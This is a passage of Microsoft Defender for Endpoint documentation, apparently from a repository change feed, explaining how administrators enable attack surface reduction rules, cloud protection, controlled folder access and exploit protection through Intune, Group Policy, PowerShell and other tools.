- :::image type="content" source="media/mem08-6-review-create.png" alt-text="The Review and create option in the Microsoft Intune admin center portal" lightbox="media/mem08-6-review-create.png":::
-
- Rules are active and live within minutes.
-
-> [!NOTE]
-> Conflict handling:
->
-> If you assign a device two different attack surface reduction policies, potential policy conflicts can occur, depending on whether rules are assigned different states, whether conflict management is in place, and whether the result is an error. Nonconflicting rules do not result in an error, and such rules are applied correctly. The first rule is applied, and subsequent nonconflicting rules are merged into the policy.
-
-### MDM
-
-Use the [./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules](/windows/client-management/mdm/policy-csp-defender#defender-attacksurfacereductionrules) configuration service provider (CSP) to individually enable and set the mode for each rule.
-
-The following is a sample for reference, using GUID values for [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md).
-
-`OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules`
-
-`Value: 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84=2|3b576869-a4ec-4529-8536-b80a7769e899=1|d4f940ab-401b-4efc-aadc-ad5f3c50688a=2|d3e037e1-3eb8-44c8-a917-57927947596d=1|5beb7efe-fd9a-4556-801d-275e5ffc04cc=0|be9ba2d9-53ea-4cdc-84e5-9b1eeee46550=1`
-
-The values to enable (Block), disable, warn, or enable in audit mode are:
--- 0: Disable (Disable the attack surface reduction rule)-- 1: Block (Enable the attack surface reduction rule)-- 2: Audit (Evaluate how the attack surface reduction rule would impact your organization if enabled)-- 6: Warn (Enable the attack surface reduction rule but allow the end-user to bypass the block). Warn mode is available for most of the attack surface reduction rules.-
-Use the [./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions](/windows/client-management/mdm/policy-csp-defender#defender-attacksurfacereductiononlyexclusions) configuration service provider (CSP) to add exclusions.
-
-Example:
-
-`OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions`
-
-`Value: c:\path|e:\path|c:\Exclusions.exe`
-
-> [!NOTE]
-> Be sure to enter OMA-URI values without spaces.
-
-### Microsoft Configuration Manager
-
-1. In Microsoft Configuration Manager, go to **Assets and Compliance** > **Endpoint Protection** > **Windows Defender Exploit Guard**.
-
-2. Select **Home** > **Create Exploit Guard Policy**.
-
-3. Enter a name and a description, select **Attack Surface Reduction**, and select **Next**.
-
-4. Choose which rules will block or audit actions and select **Next**.
-
-5. Review the settings and select **Next** to create the policy.
-
-6. After the policy is created, select **Close**.
-
-> [!WARNING]
-> There is a known issue with the applicability of Attack Surface Reduction on Server OS versions which is marked as compliant without any actual enforcement. Currently, there is no ETA for when this will be fixed.
-
-### Group Policy
-
-> [!WARNING]
-> If you manage your computers and devices with Intune, Configuration Manager, or other enterprise-level management platform, the management software will overwrite any conflicting Group Policy settings on startup.
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](https://technet.microsoft.com/library/cc731212.aspx), right-click the Group Policy Object you want to configure and select **Edit**.
-
-1. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-1. Expand the tree to **Windows components** > **Microsoft Defender Antivirus** > **Microsoft Defender Exploit Guard** > **Attack surface reduction**.
-
-1. Select **Configure Attack surface reduction rules** and select **Enabled**. You can then set the individual state for each rule in the options section. Select **Show...** and enter the rule ID in the **Value name** column and your chosen state in the **Value** column as follows:
-
- - 0: Disable (Disable the attack surface reduction rule)
- - 1: Block (Enable the attack surface reduction rule)
- - 2: Audit (Evaluate how the attack surface reduction rule would impact your organization if enabled)
- - 6: Warn (Enable the attack surface reduction rule but allow the end-user to bypass the block)
-
- :::image type="content" source="media/asr-rules-gp.png" alt-text="attack surface reduction rules in Group Policy" lightbox="media/asr-rules-gp.png":::
-
-5. To exclude files and folders from attack surface reduction rules, select the **Exclude files and paths from Attack surface reduction rules** setting and set the option to **Enabled**. Select **Show** and enter each file or folder in the **Value name** column. Enter **0** in the **Value** column for each item.
-
- > [!WARNING]
- > Do not use quotes as they are not supported for either the **Value name** column or the **Value** column.
- > The rule ID should not have any leading or trailing spaces.
-
-### PowerShell
-
-> [!WARNING]
-> If you manage your computers and devices with Intune, Configuration Manager, or another enterprise-level management platform, the management software overwrites any conflicting PowerShell settings on startup.
-
-1. Type **powershell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**.
-
-2. Type one of the following cmdlets. (For more information, such as rule ID, refer to [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md).)
-
- | Task | PowerShell cmdlet|
- |||
- | Enable attack surface reduction rules | `Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Enabled` |
- | Enable attack surface reduction rules in audit mode | `Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions AuditMode` |
- | Enable attack surface reduction rules in warn mode | `Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Warn` |
- | Enable attack surface reduction Block abuse of exploited vulnerable signed drivers | `Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled` |
- | Turn off attack surface reduction rules | `Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Disabled` |
-
- > [!IMPORTANT]
- > You must specify the state individually for each rule, but you can combine rules and states in a comma-separated list.
- >
- > In the following example, the first two rules are enabled, the third rule is disabled, and the fourth rule is enabled in audit mode: `Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID 1>,<rule ID 2>,<rule ID 3>,<rule ID 4> -AttackSurfaceReductionRules_Actions Enabled, Enabled, Disabled, AuditMode`
-
- You can also use the `Add-MpPreference` PowerShell verb to add new rules to the existing list.
-
- > [!WARNING]
- > `Set-MpPreference` overwrites the existing set of rules. If you want to add to the existing set, use `Add-MpPreference` instead. You can obtain a list of rules and their current state by using `Get-MpPreference`.
-
-3. To exclude files and folders from attack surface reduction rules, use the following cmdlet:
-
- `Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"`
-
- Continue to use `Add-MpPreference -AttackSurfaceReductionOnlyExclusions` to add more files and folders to the list.
-
- > [!IMPORTANT]
- > Use `Add-MpPreference` to append or add apps to the list. Using the `Set-MpPreference` cmdlet will overwrite the existing list.
-
-## Related articles
--- [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)-- [Evaluate attack surface reduction](evaluate-attack-surface-reduction.md)-- [Attack surface reduction FAQ](attack-surface-reduction.md)-
security Enable Cloud Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus.md
- Title: Turn on cloud protection in Microsoft Defender Antivirus
-description: Turn on cloud protection to benefit from fast and advanced protection features.
---- Previously updated : 04/03/2024------- m365-security-- tier2-- mde-asr--
-# Turn on cloud protection in Microsoft Defender Antivirus
-
-**Applies to:**
--- Microsoft Defender Antivirus-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-**Platforms**
-- Windows-
-[Cloud protection in Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md) delivers accurate, real-time, and intelligent protection. Cloud protection should be enabled by default.
-
-> [!NOTE]
-> [Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) helps keep cloud protection and other security settings from being changed. As a result, when tamper protection is enabled, any changes made to [tamper-protected settings](/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#what-happens-when-tamper-protection-is-turned-on) are ignored. If you must make changes to a device and those changes are blocked by tamper protection, we recommend using [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device. Note that after troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.
-
-## Why cloud protection should be turned on
-
-Microsoft Defender Antivirus cloud protection helps protect against malware on your endpoints and across your network. We recommend keeping cloud protection turned on, because certain security features and capabilities in Microsoft Defender for Endpoint only work when cloud protection is enabled.
-
-[![alt-text="Diagram showing things that depend on cloud protection](medi)
--
-The following table summarizes the features and capabilities that depend on cloud protection: <br/><br/>
-
-| Feature/Capability | Subscription requirement | Description |
-|||--|
-| **Checking against metadata in the cloud**. The Microsoft Defender Antivirus cloud service uses machine learning models as an extra layer of defense. These machine learning models include metadata, so when a suspicious or malicious file is detected, its metadata is checked. <br/><br/>To learn more, see [Blog: Get to know the advanced technologies at the core of Microsoft Defender for Endpoint next-generation protection](https://www.microsoft.com/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/) | Microsoft Defender for Endpoint Plan 1 or Plan 2 (Standalone or included in a plan like Microsoft 365 E3 or E5) |
-| **[Cloud protection and sample submission](cloud-protection-microsoft-antivirus-sample-submission.md)**. Files and executables can be sent to the Microsoft Defender Antivirus cloud service for detonation and analysis. Automatic sample submission relies on cloud protection, although it can also be configured as a standalone setting.<br/><br/>To learn more, see [Cloud protection and sample submission in Microsoft Defender Antivirus](cloud-protection-microsoft-antivirus-sample-submission.md). | Microsoft Defender for Endpoint Plan 1 or Plan 2 (Standalone or included in a plan like Microsoft 365 E3 or E5) |
-| **[Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)**. Tamper protection helps protect against unwanted changes to your organization's security settings. <br/><br/>To learn more, see [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md). | Microsoft Defender for Endpoint Plan 2 (Standalone or included in a plan like Microsoft 365 E5) |
-| **[Block at first sight](configure-block-at-first-sight-microsoft-defender-antivirus.md)** <br/>Block at first sight detects new malware and blocks it within seconds. When a suspicious or malicious file is detected, block at first sight capabilities queries the cloud protection backend and applies heuristics, machine learning, and automated analysis of the file to determine whether it's a threat.<br/><br/>To learn more, see [What is "block at first sight"?](configure-block-at-first-sight-microsoft-defender-antivirus.md#what-is-block-at-first-sight) | Microsoft Defender for Endpoint Plan 1 or Plan 2 (Standalone or included in a plan like Microsoft 365 E3 or E5) |
-| **[Emergency signature updates](microsoft-defender-antivirus-updates.md#security-intelligence-updates)**. When malicious content is detected, emergency signature updates and fixes are deployed. Rather than wait for the next regular update, you can receive these fixes and updates within minutes. <br/><br/>To learn more about updates, see [Microsoft Defender Antivirus security intelligence and product updates](microsoft-defender-antivirus-updates.md). | Microsoft Defender for Endpoint Plan 2 (Standalone or included in a plan like Microsoft 365 E5) |
-| **[Endpoint detection and response (EDR) in block mode](edr-in-block-mode.md)**. EDR in block mode provides extra protection when Microsoft Defender Antivirus isn't the primary antivirus product on a device. EDR in block mode remediates artifacts found during EDR-generated scans that the non-Microsoft, primary antivirus solution might have missed. When enabled for devices with Microsoft Defender Antivirus as the primary antivirus solution, EDR in block mode provides the added benefit of automatically remediating artifacts identified during EDR-generated scans. <br/><br/>To learn more, see [EDR in block mode](edr-in-block-mode.md). | Microsoft Defender for Endpoint Plan 2 (Standalone or included in a plan like Microsoft 365 E5) |
-| **[Attack surface reduction rules](attack-surface-reduction.md)**. ASR rules are intelligent rules that you can configure to help stop malware. Certain rules require cloud protection to be turned on in order to function fully. These rules include: <br/>- Block executable files from running unless they meet a prevalence, age, or trusted list criteria <br/>- Use advanced protection against ransomware <br/>- Block untrusted programs from running from removable drives <br/><br/>To learn more, see [Use attack surface reduction rules to prevent malware infection](attack-surface-reduction.md). | Microsoft Defender for Endpoint Plan 1 or Plan 2 (Standalone or included in a plan like Microsoft 365 E3 or E5) |
-| **[Indicators of compromise (IoCs)](manage-indicators.md)**. In Defender for Endpoint, IoCs can be configured to define the detection, prevention, and exclusion of entities. Examples: <br/>"Allow" indicators can be used to define exceptions to antivirus scans and remediation actions.<br/>"Alert and block" indicators can be used to prevent files or processes from executing. <br/><br/>To learn more, see [Create indicators](manage-indicators.md). | Microsoft Defender for Endpoint Plan 2 (Standalone or included in a plan like Microsoft 365 E5) |
--
-## Methods to configure cloud protection
-
-You can turn Microsoft Defender Antivirus cloud protection on or off by using one of several methods, such as:
--- [Microsoft Intune](#use-microsoft-intune-to-turn-on-cloud-protection) -- [Group Policy](#use-group-policy-to-turn-on-cloud-protection)-- [PowerShell cmdlets](#use-powershell-cmdlets-to-turn-on-cloud-protection)-- [Windows Management Instruction](#use-windows-management-instruction-wmi-to-turn-on-cloud-protection) (WMI)-
-You can also use [Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection). And, you can turn cloud protection on or off on individual endpoints by using the [Windows Security app](#turn-on-cloud-protection-on-individual-clients-with-the-windows-security-app).
-
-For more information about the specific network-connectivity requirements to ensure your endpoints can connect to the cloud protection service, see [Configure and validate network connections](configure-network-connections-microsoft-defender-antivirus.md).
-
-> [!NOTE]
-> In Windows 10 and Windows 11, there is no difference between the **Basic** and **Advanced** reporting options described in this article. This is a legacy distinction and choosing either setting results in the same level of cloud protection. There is no difference in the type or amount of information that is shared. For more information on what we collect, see the [Microsoft Privacy Statement](https://go.microsoft.com/fwlink/?linkid=521839).
-
-## Use Microsoft Intune to turn on cloud protection
-
-1. Go to the Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)) and sign in.
-
-2. Choose **Endpoint security** \> **Antivirus**.
-
-3. In the **AV policies** section, either select an existing policy, or choose **+ Create Policy**.
-
- | Task | Steps |
- |||
- | Create a new policy | 1. For **Platform**, select **Windows 10, Windows 11, and Windows Server**. <br/><br/>2. For **Profile**, select **Microsoft Defender Antivirus**.<br/><br/>3. On the **Basics** page, specify a name and description for the policy, and then choose **Next**.<br/><br/>4. In the **Defender** section, find **Allow Cloud Protection**, and set it to **Allowed**. Then choose **Next**. <br/><br/>5. Scroll down to **Submit Samples Consent**, and select one of the following settings:<br/>- **Send all samples automatically**<br/>- **Send safe samples automatically**<br/><br/>6. On the **Scope tags** step, if your organization is using [scope tags](/mem/intune/fundamentals/scope-tags), select the tags you want to use, and then choose **Next**.<br/><br/>7. On the **Assignments** step, select the groups, users, or devices that you want to apply this policy to, and then choose **Next**.<br/><br/>8. On the **Review + create** step, review the settings for your policy, and then choose **Create**. |
- | Edit an existing policy | 1. Select the policy that you want to edit.<br/><br/>2. Under **Configuration settings**, choose **Edit**.<br/><br/>3. In the **Defender** section, find **Allow Cloud Protection**, and set it to **Allowed**.<br/><br/>4. Scroll down to **Submit Samples Consent**, and select one of the following settings:<br/>- **Send all samples automatically**<br/>- **Send safe samples automatically**<br/><br/>5. Select **Review + save**. |
-
-> [!TIP]
-> To learn more about Microsoft Defender Antivirus settings in Intune, see [Antivirus policy for endpoint security in Intune](/mem/intune/protect/endpoint-security-antivirus-policy).
-
-## Use Group Policy to turn on cloud protection
-
-1. On your Group Policy management device, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration**.
-
-3. Select **Administrative templates**.
-
-4. Expand the tree to **Windows components** > **Microsoft Defender Antivirus > MAPS**
-
- > [!NOTE]
- > MAPS settings are equal to cloud-delivered protection.
-
-5. Double-click **Join Microsoft MAPS**. Ensure the option is turned on and set to **Basic MAPS** or **Advanced MAPS**. Select **OK**.
-
- You can choose to send basic or additional information about detected software:
-
- - Basic MAPS: Basic membership sends basic information to Microsoft about malware and potentially unwanted software that has been detected on your device. Information includes where the software came from (like URLs and partial paths), the actions taken to resolve the threat, and whether the actions were successful.
-
- - Advanced MAPS: In addition to basic information, advanced membership sends detailed information about malware and potentially unwanted software, including the full path to the software, and detailed information about how the software has affected your device.
-
-6. Double-click **Send file samples when further analysis is required**. Ensure that the first option is set to **Enabled** and that the other options are set to either:
-
- - **Send safe samples** (1)
- - **Send all samples** (3)
-
- > [!NOTE]
- > The **Send safe samples** (1) option means that most samples are sent automatically. Files that are likely to contain personal information prompt the user for additional confirmation.
- > Setting the option to **Always Prompt** (0) lowers the protection state of the device. Setting it to **Never send** (2) means that the [Block at First Sight](configure-block-at-first-sight-microsoft-defender-antivirus.md) feature of Microsoft Defender for Endpoint won't work.
-
-7. Select **OK**.
-
-## Use PowerShell cmdlets to turn on cloud protection
-
-The following cmdlets can turn on cloud protection:
-
-```PowerShell
-Set-MpPreference -MAPSReporting Advanced
-Set-MpPreference -SubmitSamplesConsent SendAllSamples
-```
-
-For more information on how to use PowerShell with Microsoft Defender Antivirus, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Microsoft Defender Antivirus cmdlets](/powershell/module/defender/). [Policy CSP - Defender](/windows/client-management/mdm/policy-csp-defender) also has more information specifically on [-SubmitSamplesConsent](/windows/client-management/mdm/policy-csp-defender#defender-submitsamplesconsent).
-
-> [!IMPORTANT]
-> You can set **-SubmitSamplesConsent** to `SendSafeSamples` (the default, recommended setting), `NeverSend`, or `AlwaysPrompt`.
-> The `SendSafeSamples` setting means that most samples are sent automatically. Files that are likely to contain personal information result in a prompt for the user to continue, and require confirmation.
-> The `NeverSend` and `AlwaysPrompt` settings lower the protection level of the device. Furthermore, the `NeverSend` setting means that the [Block at First Sight](configure-block-at-first-sight-microsoft-defender-antivirus.md) feature of Microsoft Defender for Endpoint won't work.
-
-## Use Windows Management Instruction (WMI) to turn on cloud protection
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/defender/set-msft-mppreference) class for the following properties:
-
-```WMI
-MAPSReporting
-SubmitSamplesConsent
-```
-
-For more information about allowed parameters, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-## Turn on cloud protection on individual clients with the Windows Security app
-
-> [!NOTE]
-> If the **Configure local setting override for reporting Microsoft MAPS** Group Policy setting is set to **Disabled**, then the **Cloud-based protection** setting in Windows Settings are greyed out and unavailable. Changes made through a Group Policy Object must first be deployed to individual endpoints before the setting is updated in Windows Settings.
-
-1. Open the Windows Security app by selecting the shield icon in the task bar, or by searching the start menu for **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar), and then, under **Virus & threat protection settings**, select **Manage settings**.
-
- :::image type="content" source="../../media/wdav-protection-settings-wdsc.png" alt-text="The Virus & threat protection settings" lightbox="../../media/wdav-protection-settings-wdsc.png":::
-
-3. Confirm that **Cloud-based Protection** and **Automatic sample submission** are switched to **On**.
-
- > [!NOTE]
- > If automatic sample submission has been configured with Group Policy, then the setting is greyed out and unavailable.
-
-## See also
--- [Use Microsoft cloud protection in Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md)--- [Configuration --- [Use PowerShell cmdlets to manage Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md)-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
security Enable Controlled Folders https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-controlled-folders.md
- Title: Enable controlled folder access
-description: Learn how to protect your important files by enabling Controlled folder access
---------- m365-security-- tier3-- mde-asr Previously updated : 08/15/2023--
-# Enable controlled folder access
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-[Controlled folder access](controlled-folders.md) helps you protect valuable data from malicious apps and threats, such as ransomware. Controlled folder access is included with Windows 10, Windows 11, and Windows Server 2019. Controlled folder access is also included as part of the [modern, unified solution for Windows Server 2012R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-functionality-in-the-modern-unified-solution-for-windows-server-2012-r2-and-2016-preview).
-
-You can enable controlled folder access by using any of these methods:
--- [Windows Security app *](#windows-security-app)-- [Microsoft Intune](#microsoft-intune)-- [Mobile Device Management (MDM)](#mobile-device-management-mdm)-- [Microsoft Configuration Manager](#microsoft-configuration-manager)-- [Group Policy](#group-policy)-- [PowerShell](#powershell)-
-> [!TIP]
-> Try using [audit mode](evaluate-controlled-folder-access.md) at first so you can see how the feature works and review events without impacting normal device usage in your organization.
-
-Group Policy settings that disable local administrator list merging will override controlled folder access settings. They also override protected folders and allowed apps set by the local administrator through controlled folder access. These policies include:
--- Microsoft Defender Antivirus **Configure local administrator merge behavior for lists**-- System Center Endpoint Protection **Allow users to add exclusions and overrides**-
-For more information about disabling local list merging, see [Prevent or allow users to locally modify Microsoft Defender Antivirus policy settings](/windows/security/threat-protection/microsoft-defender-antivirus/configure-local-policy-overrides-microsoft-defender-antivirus).
-
-## Windows Security app
-
-1. Open the Windows Security app by selecting the shield icon in the task bar. You can also search the start menu for **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar) and then select **Ransomware protection**.
-
-3. Set the switch for **Controlled folder access** to **On**.
-
-> [!NOTE]
-> *This method is not available on Windows Server 2012R2 or 2016.
->
-> If controlled folder access is configured with Group Policy, PowerShell, or MDM CSPs, the state will change in the Windows Security app after a restart of the device.
-> If the feature is set to **Audit mode** with any of those tools, the Windows Security app will show the state as **Off**.
-> If you are protecting user profile data, we recommend that the user profile should be on the default Windows installation drive.
-
-## Microsoft Intune
-
-1. Sign in to the [Microsoft Intune admin center](https://endpoint.microsoft.com) and open **Endpoint Security**.
-
-2. Go to **Attack Surface Reduction** \> **Policy**.
-
-3. Select **Platform**, choose **Windows 10, Windows 11, and Windows Server**, and select the profile **Attack Surface Reduction rules** \> **Create**.
-
-4. Name the policy and add a description. Select **Next**.
-
-5. Scroll down, and in the **Enable Controlled Folder Access** drop-down, select an option, such as **Audit Mode**.
-
- We recommend enabling controlled folder access in audit mode first to see how it'll work in your organization. You can set it to another mode, such as **Enabled**, later.
-
-6. To optionally add folders that should be protected, select **Controlled Folder Access Protected Folders** and then add folders. Files in these folders can't be modified or deleted by untrusted applications. Keep in mind that your default system folders are automatically protected. You can view the list of default system folders in the Windows Security app on a Windows device. To learn more about this setting, see [Policy CSP - Defender: ControlledFolderAccessProtectedFolders](/windows/client-management/mdm/policy-csp-defender?#controlledfolderaccessprotectedfolders).
-
-7. To optionally add applications that should be trusted, select **Controlled Folder Access Allowed Applications** and then add the apps can access protected folders. Microsoft Defender Antivirus automatically determines which applications should be trusted. Only use this setting to specify additional applications. To learn more about this setting, see [Policy CSP - Defender: ControlledFolderAccessAllowedApplications](/windows/client-management/mdm/policy-csp-defender#controlledfolderaccessallowedapplications).
-
-8. Select the profile **Assignments**, assign to **All Users & All Devices**, and select **Save**.
-
-9. Select **Next** to save each open blade and then **Create**.
-
-> [!NOTE]
-> Wildcards are supported for applications, but not for folders. Subfolders are not protected. Allowed apps will continue to trigger events until they are restarted.
-
-## Mobile Device Management (MDM)
-
-Use the [./Vendor/MSFT/Policy/Config/ControlledFolderAccessProtectedFolders](/windows/client-management/mdm/policy-csp-defender) configuration service provider (CSP) to allow apps to make changes to protected folders.
-
-## Microsoft Configuration Manager
-
-1. In Microsoft Configuration Manager, go to **Assets and Compliance** \> **Endpoint Protection** \> **Windows Defender Exploit Guard**.
-
-2. Select **Home** \> **Create Exploit Guard Policy**.
-
-3. Enter a name and a description, select **Controlled folder access**, and select **Next**.
-
-4. Choose whether block or audit changes, allow other apps, or add other folders, and select **Next**.
-
- > [!NOTE]
- > Wildcard is supported for applications, but not for folders. Subfolders are not protected. Allowed apps will continue to trigger events until they are restarted.
-
-5. Review the settings and select **Next** to create the policy.
-
-6. After the policy is created, **Close**.
-
-## Group Policy
-
-1. On your Group Policy management device, open the [Group Policy Management Console](https://technet.microsoft.com/library/cc731212.aspx), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.
-
-3. Expand the tree to **Windows components > Microsoft Defender Antivirus > Microsoft Defender Exploit Guard > Controlled folder access**.
-
-4. Double-click the **Configure Controlled folder access** setting and set the option to **Enabled**. In the options section you must specify one of the following options:
- - **Enable** - Malicious and suspicious apps won't be allowed to make changes to files in protected folders. A notification will be provided in the Windows event log.
- - **Disable (Default)** - The Controlled folder access feature won't work. All apps can make changes to files in protected folders.
- - **Audit Mode** - Changes will be allowed if a malicious or suspicious app attempts to make a change to a file in a protected folder. However, it will be recorded in the Windows event log where you can assess the impact on your organization.
- - **Block disk modification only** - Attempts by untrusted apps to write to disk sectors will be logged in Windows Event log. These logs can be found in **Applications and Services Logs** \> Microsoft \> Windows \> Windows Defender \> Operational \> ID 1123.
- - **Audit disk modification only** - Only attempts to write to protected disk sectors will be recorded in the Windows event log (under **Applications and Services Logs** \> **Microsoft** \> **Windows** \> **Windows Defender** \> **Operational** \> **ID 1124**). Attempts to modify or delete files in protected folders won't be recorded.
-
- :::image type="content" source="../../media/cfa-gp-enable.png" alt-text="The group policy option Enabled and Audit Mode selected" lightbox="../../media/cfa-gp-enable.png":::
-
-> [!IMPORTANT]
-> To fully enable controlled folder access, you must set the Group Policy option to **Enabled** and select **Block** in the options drop-down menu.
-
-## PowerShell
-
-1. Type **powershell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**.
-
-2. Enter the following cmdlet:
-
- ```PowerShell
- Set-MpPreference -EnableControlledFolderAccess Enabled
- ```
-
-You can enable the feature in audit mode by specifying `AuditMode` instead of `Enabled`.
-
-Use `Disabled` to turn off the feature.
-
-## See also
--- [Protect important folders with controlled folder access](controlled-folders.md)-- [Customize controlled folder access](customize-controlled-folders.md)-- [Evaluate Microsoft Defender for Endpoint](evaluate-mde.md)
security Enable Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-exploit-protection.md
- Title: Turn on exploit protection to help mitigate against attacks
-description: Learn how to enable exploit protection in Windows. Exploit protection helps protect your device against malware.
---------- m365-security-- tier3-- mde-asr Previously updated : 05/03/2023--
-# Enable exploit protection
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!TIP]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-[Exploit protection](exploit-protection.md) helps protect against malware that uses exploits to infect devices and spread. Exploit protection consists of many mitigations that can be applied to either the operating system or individual apps.
-
-> [!IMPORTANT]
-> .NET 2.0 is not compatible with some exploit protection capabilities, specifically, Export Address Filtering (EAF) and Import Address Filtering (IAF). If you have enabled .NET 2.0, usage of EAF and IAF are not supported.
-
-Many features from the Enhanced Mitigation Experience Toolkit (EMET) are included in exploit protection.
-
-You can enable each mitigation separately by using any of these methods:
--- [Windows Security app](#windows-security-app)-- [Microsoft Intune](#intune)-- [Mobile Device Management (MDM)](#mdm)-- [Microsoft Configuration Manager](#microsoft-configuration-manager)-- [Group Policy](#group-policy)-- [PowerShell](#powershell)-
-Exploit protection is configured by default in Windows 10 and Windows 11. You can set each mitigation to on, off, or to its default value. Some mitigations have more options. You can [export these settings as an XML file](import-export-exploit-protection-emet-xml.md) and deploy them to other devices.
-
-You can also set mitigations to [audit mode](evaluate-exploit-protection.md). Audit mode allows you to test how the mitigations would work (and review events) without impacting the normal use of the device.
-
-## Windows Security app
-
-1. Open the Windows Security app by either selecting the shield icon in your task bar, or by searching the Start menu for **Security**.
-
-2. Select the **App & browser control** tile (or the app icon on the left menu bar) and then select **Exploit protection settings**.
-
-3. Go to **Program settings** and choose the app you want to apply mitigations to.
- - If the app you want to configure is already listed, select it, and then select **Edit**.
- - If the app isn't listed, at the top of the list select **Add program to customize** and then choose how you want to add the app.
- - Use **Add by program name** to have the mitigation applied to any running process with that name. Specify a file with its extension. You can enter a full path to limit the mitigation to only the app with that name in that location.
- - Use **Choose exact file path** to use a standard Windows Explorer file picker window to find and select the file you want.
-
-4. After selecting the app, you'll see a list of all the mitigations that can be applied. Choosing **Audit** will apply the mitigation in audit mode only. You're notified if you need to restart the process or app, or if you need to restart Windows.
-
-5. Repeat steps 3-4 for all the apps and mitigations you want to configure.
-
-6. Under the **System settings** section, find the mitigation you want to configure and then specify one of the following settings. Apps that aren't configured individually in the **Program settings** section use the settings that are configured here.
- - **On by default**: The mitigation is *enabled* for apps that don't have this mitigation set in the app-specific **Program settings** section
